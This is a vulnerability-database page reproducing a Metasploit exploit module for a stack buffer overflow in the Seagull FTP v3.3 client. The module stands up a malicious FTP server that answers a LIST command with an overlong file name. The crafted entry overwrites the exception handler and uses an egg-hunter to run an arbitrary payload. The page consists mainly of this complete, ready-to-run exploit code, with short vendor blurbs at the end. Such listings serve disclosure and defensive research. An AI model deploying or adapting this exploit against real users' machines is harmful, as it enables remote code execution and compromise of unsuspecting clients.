Lucene search
K

Seagull FTP v3.3 Build 409 Stack Buffer Overflow

🗓️ 12 Oct 2010 17:31:18Reported by corelanc0d3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 9 Views

Seagull FTP v3.3 Build 409 Stack Buffer Overflow when processing an overly long file/folder name in response to a LIST command

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::FtpServer
  include Msf::Exploit::Omelet

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the Seagull FTP client that gets
        triggered when the ftp client processes a response to a LIST command. If the
        response contains an overly long file/folder name, a buffer overflow occurs,
        overwriting a structured exception handler.
      },
      'Author' 	 =>
        [
          'corelanc0d3r <peter.ve[at]corelan.be>' # found bug, wrote the exploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '94556' ],
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'BadChars' => "\x00",
          'StackAdjustment' => -1500,
          'DisableNops' => 'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'XP Universal', { 'Offset' => 232, 'Ret' => 0x7CE4650C } ], # jmp esp shell32.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-10-12',
      'DefaultTarget'  => 0))
  end

  #---------------------------------------------------------------------------------

  def setup
    super
  end

  def on_client_unknown_command(c,cmd,arg)
    c.put("200 OK\r\n")
  end

  def on_client_command_list(c,arg)
    print_status("Handling LIST command")
    conn = establish_data_connection(c)
    if(not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end
    print_status(" - Data connection set up")
    code = 150
    c.put("#{code} Here comes the directory listing.\r\n")
    code = 226
    c.put("#{code} Directory send ok.\r\n")

    crash = "A" * target['Offset']
    crash << [target.ret].pack('V')

    #corelanc0d3r's omelet mixin
    thepayload = ("\x90" * 30) + payload.encoded

    omeletoptions =
    {
      :eggsize => 123,
      :eggtag => "00w",
      :searchforward => true,
      :reset => false,
      :checksum => true
    }
    badchars = '\x00'
    omelet =  generate_omelet(thepayload,badchars,omeletoptions)

    omeletcode = omelet[0]
    print_status("[+] Omelet code : #{omeletcode.length} bytes")
    print_status("[+] Number of eggs : #{omelet[1].length}")
    print_status("[+] Sending payload")
    crash << ("\x90" * 30) + omeletcode

    print_status(" - Sending directory list via data connection")
    dirlist = ""

    omelet[1].each do |thischunk|
      print_status(" [+] Planted egg of #{thischunk.length} bytes")
      dirlist << "drwxrwxrwx    1 100      0           11111 Jun 11 21:10 #{thischunk}\r\n"
    end
    dirlist << "drwxrwxrwx    1 100      0           11111 Jun 11 21:10 #{crash}\r\n"
    conn.put("total #{omelet[1].length+1}\r\n"+dirlist)
    conn.close
    print_status(" - Wait for omelet hunter...")
    return
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation